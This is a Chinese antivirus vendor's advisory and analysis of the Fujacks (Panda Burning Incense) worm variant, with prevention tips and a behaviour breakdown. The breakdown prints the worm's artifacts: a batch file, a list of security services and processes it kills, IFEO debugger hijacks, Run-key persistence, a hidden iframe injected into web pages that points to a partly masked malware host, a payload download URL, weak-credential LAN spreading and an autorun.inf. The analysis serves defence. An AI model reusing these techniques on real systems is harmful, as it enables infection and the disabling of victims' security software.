斗地主小游戏奥维  |  微點新聞  |  業界動態  |  安全資訊  |  安全快報  |  產品信息  |  網絡版首頁
通行證  |  客服中心  |  微點社區  |  微點郵局  |  常見問題  |  在線訂購  |  各地代理商
 

熊貓燒香變種Worm.Win32.Fujacks.kat

熊貓燒香變種Worm.Win32.Fujacks.kat

Worm.Win32.Fujacks.kat

捕獲時間

2009-1-20

病毒摘要

該樣本是使用“Delphi”編寫的熊貓燒香變種,由微點主動防御軟件自動捕獲,采用“ASPack”加殼方式試圖躲避特征碼掃描,加殼后長度為 “295,166字節”,圖標采用被感染文件的圖標,使用“exe”擴展名,通過“網頁木馬”、“文件捆綁”、“移動存儲介質”、“局域網”等途徑植入用戶計算機,運行后下載其他木馬到本地運行。

感染對象

Windows 2000/Windows XP/Windows 2003

傳播途徑

網頁木馬、文件捆綁、移動存儲介質、局域網

防范措施

已安裝使用微點主動防御軟件的用戶,無須任何設置,微點主動防御將自動?;つ南低趁饈芨貌《鏡娜肭趾推蘋?。無論您是否已經升級到最新版本,微點主動防御都能夠有效清除該病毒。如果您沒有將微點主動防御軟件升級到最新版,微點主動防御軟件在發現該病毒后將報警提示您發現“未知木馬”,請直接選擇刪除處理(如圖1);


       圖1 微點主動防御軟件自動捕獲未知病毒(未升級)



如果您已經將微點主動防御軟件升級到最新版本,微點將報警提示您發現"Worm.Win32.Fujacks.kat”,請直接選擇刪除(如圖2)。


       圖2 微點主動防御軟件升級后截獲已知病毒

對于未使用微點主動防御軟件的用戶,微點反病毒專家建議
1、不要在不明站點下載非官方版本的軟件進行安裝,避免病毒通過捆綁的方式進入您的系統。
2、建議關閉U盤自動播放,具體操作步驟:開始->運行->gpedit.msc->計算機配置->管理模板->系統->在右側找到"關閉自動播放"->雙擊->選擇"已啟用"。
3、盡快將您的殺毒軟件特征庫升級到最新版本進行查殺,并開啟防火墻攔截網絡異常訪問,如依然有異常情況請注意及時與專業的安全軟件廠商聯系獲取技術支持。
4、開啟windows自動更新,及時打好漏洞補丁。

病毒分析

該樣本程序被執行后,讀取自身釋放出感染前的正常文件---UFReader.exe到當前目錄下,名稱為記錄在文件末尾處的感染信息中的欲創建文件名字“UFReader.exe.exe”,并調用在目錄%Temp%\下創建的隨機名稱批處理文件,等待樣本程序進程結束后,進行對樣本的刪除并恢復感染前的正常文件,恢復后進行調用運行實現樣本運行過程的隱藏,批處理文件內容如下:

 
:try1
del "C:\感染后的正常文件名"
if exist "C:\感染后的正常文件名" goto try1
ren "C:\感染后的正常文件名.exe" "感染后的正常文件名"
if exist "感染后的正常文件名.exe" goto try2
"感染后的正常文件名"
:try2
del %0


嘗試刪除目錄%SystemRoot%\system32\drivers\下“TXPlatform.exe”文件,并釋放病毒衍生物“TXPlatform.exe”文件,成功后調用運行“TXPlatform.exe”開啟一個新的進程并結束樣本自身進程。

“TXPlatform.exe”進程啟動后,釋放名為“z.tmp”的文件到目錄%SystemDrive%\下,并經過指定的解密創建“z1.tmp”名稱文件,創建下列“RESSDT”服務:

 
項:
HKLM\SYSTEM\CurrentControlSet\Services\RESSDT

鍵值:DisplayName
指向數據:RESSDT
健值:ImagePath
指向數據:%SystemDrive %\z1.tmp


服務創建成功后調用此服務,驅動加載后恢復系統SSDT表,解除計算機部分殺軟的主動防御,達到自身?;さ哪康?,成功后關閉此服務,并將此服務與“z1.tmp”、“z.tmp”文件進行刪除,實現對恢復系統SSDT表??櫚囊?。

遍歷查找下列指定進程,找到后嘗試關閉該進程:

 
svchosL.exe


嘗試打開下列服務,一旦成功打開便嘗試對該服務進行下列的停止或刪除操作:

 
“Schedule”            停止服務
“sharedaccess”         停止服務
“kavsvc”              停止服務
“kavsvc”              刪除服務
“AVP”                停止服務
“AVP”                刪除服務
“McAfeeFramework”    停止服務
“McAfeeFramework”    刪除服務
“McShield”            停止服務
“McTaskManager”      停止服務
“McTaskManager”      刪除服務
“McShield”            刪除服務
“navapsvc”            刪除服務
“wscsvc”              刪除服務
“KPfwSvc”            刪除服務
“SNDSrvc”            刪除服務
“ccProxy”             刪除服務
“ccEvtMgr”            刪除服務
“ccSetMgr”            刪除服務
“SPBBCSvc”           刪除服務
“Symantec Core LC”     刪除服務
“NPFMntor”            刪除服務
“MskService”           刪除服務
“FireSvc”              刪除服務
“RsCCenter”           停止服務
“RsCCenter”           刪除服務
“RsRavMon”           停止服務
“RsRavMon”           刪除服務


遍歷查找包含下列文字的窗口,一旦找到便終止該進程:

  
Winsock Expert
ComnView
SmartSniff
Sniff
CaptureNet
Spinet
Dsniff
嗅探
抓包


修改注冊表去除隱藏文件和文件夾屬性,實現自身隱藏目的:

 
項:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
鍵值:CheckedValue
數據:0


刪除系統啟動項HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下指定安全軟件的啟動項鍵值,實現指定安全軟件不能隨機啟動:

 
鍵值:
kav
KAVPersonal50
AVP
McAfeeUpdaterUI
Network Associates Error Reporting Service
ShStatEXE


在注冊表HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\下添加下列項,達到劫持大部分安全軟件的目的:

 
360hotfix.exe
360rpt.exe
360safe.exe
360safebox.exe
360tray.exe
agentsvr.exe
apvxdwin.exe
ast.exe
avcenter.exe
avengine.exe
avgnt.exe
avguard.exe
avltmain.exe
avp.exe
avp32.exe
avtask.exe
bdagent.exe
bdwizreg.exe
boxmod.exe
ccapp.exe
ccenter.exe
ccevtmgr.exe
ccregvfy.exe
ccsetmgr.exe
egui.exe
ekrn.exe
extdb.exe
frameworkservice.exe
frwstub.exe
guardfield.exe
iparmor.exe
kaccore.exe
kasmain.exe
kav32.exe
kavstart.exe
kavsvc.exe
kavsvcui.exe
kislnchr.exe
kissvc.exe
kmailmon.exe
knownsvr.exe
kpfw32.exe
kpfwsvc.exe
kregex.exe
kvfw.exe
kvmonxp.exe
kvmonxp.kxp
kvol.exe
kvprescan.exe
kvsrvxp.exe
kvwsc.exe
kvxp.kxp
kwatch.exe
livesrv.exe
makereport.exe
mcdash.exe
mcdash.exe
mcdetect.exe
mcdash.exe
mcshield.exe
mctskshd.exe
mcvsescn.exe
mcvsshld.exe
mghtml.exe
naprdmgr.exe
navapsvc.exe
navapw32.exe
navw32.exe
nmain.exe
nod32.exe
nod32krn.exe
nod32kui.exe
npfmntor.exe
oasclnt.exe
pavsrv51.exe
pfw.exe
psctrls.exe
psimreal.exe
psimsvc.exe
qqdoctormain.exe
ras.exe
ravmon.exe
ravmond.exe
ravstub.exe
ravtask.exe
rfwcfg.exe
rfwmain.exe
rfwproxy.exe
rfwsrv.exe
rsagent.exe
rsmain.exe
rsnetsvr.exe
rssafety.exe
safebank.exe
scan32.exe
scanfrm.exe
sched.exe
seccenter.exe
secnotifier.exe
SetupLD.exe
shstat.exe
smartup.exe
sndsrvc.exe
spbbcsvc.exe
symlcsvc.exe
tbmon.exe
uihost.exe
ulibcfg.exe
updaterui.exe
uplive.exe
vcr32.exe
vcrmon.exe
vptray.exe
vsserv.exe
vstskmgr.exe
webproxy.exe
xcommsvr.exe
xnlscn.exe

鍵值均為:debugger
數據均指向:ntsd -d


添加注冊表啟動項,達到開機自啟動目的:

 
項:
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
鍵值:Explorer
數據:%SystemRoot%\system32\drivers\TXPlatform.exe


遍歷查找除下列指定的文件夾外的所有“.exe”,“.scr”,“.com”,“.pif”文件,找到后,讀取文件取得文件圖標后到目錄%Temp%\下創建為該隨機名稱的圖標,拷貝自身替換文件,讀取創建的圖標把拷貝過來的文件替換為原文件的圖標,并把原文件與感染信息寫入,并嘗試調用“winrar.exe”的相關指令感染壓縮包內的文件,實現破壞用戶文件資料與自身的自我?;?,并在感染過的文件夾下,創建一個記錄感染日期的名為“ desktop_1.ini”的文件,并修改屬性為“只讀”、“隱藏”與“系統”。

 
windows
winrar
winnt
system32
documents and settings
system volume information
recycled
windows nt
windowsupdate
windows media player
outlook express
internet explorer
netmeeting
common files
complus applications
common files
messenger
installshield installation information
msn
microsoft frontpage
movie maker
msn gamin zone


并遍歷查找“.htm”, “.html”, “.asp”, “.aspx”, “.jsp”, “.php”類型文件,找到后定位到文件末尾,添加下列代碼,實現對網頁類型文件的掛馬:

  
<iframe src="//www.52**S.COM/goto/mm.Htm" width=0 height=0></iframe>


刪除自身的除IPC$外的所有默認共享,枚舉局域網共享,找到后嘗試使用指定的大量弱口令密碼與下列指定的用戶名進行逐個嘗試訪問,成功后在局域網中傳播此病毒:

 
“Administrator”
“Guest”
“admin"
“Root”
“Apartment”
“Free”
“Both”
“Neutral”


等待訪問下列網址木馬列表進行下載其它木馬并在下載后自動運行:

 
//www.ip****gou.com/goto/down.txt


該網址內容為:

 
//www.52**s.com/090110.exe


并訪問下列網址進行自身統計:

 
//www.52**s.com/TJ.Htm


不斷遍歷磁盤,嘗試調用目錄%Temp%\下創建的隨機名稱批處理,刪除免疫文件夾,批處理內容如下:

 
rmdir /s /q 盤符:\autorun.inf
del %0


拷貝自身名為“   .exe”到磁盤分區根目錄,并創建“autorun.inf”文件,均修改屬性為“只讀”、“隱藏”與“系統”,“autorun.inf”內容為:

 
[AutoRun]
OPEN=   .exe
shell\open=打開(&O)
shell\open\Command=   .exe
shell\open\Default=1
shell\explore=資源管理器(&X)
shell\explore\Command=   .exe

 

免費試用
下  載
安裝演示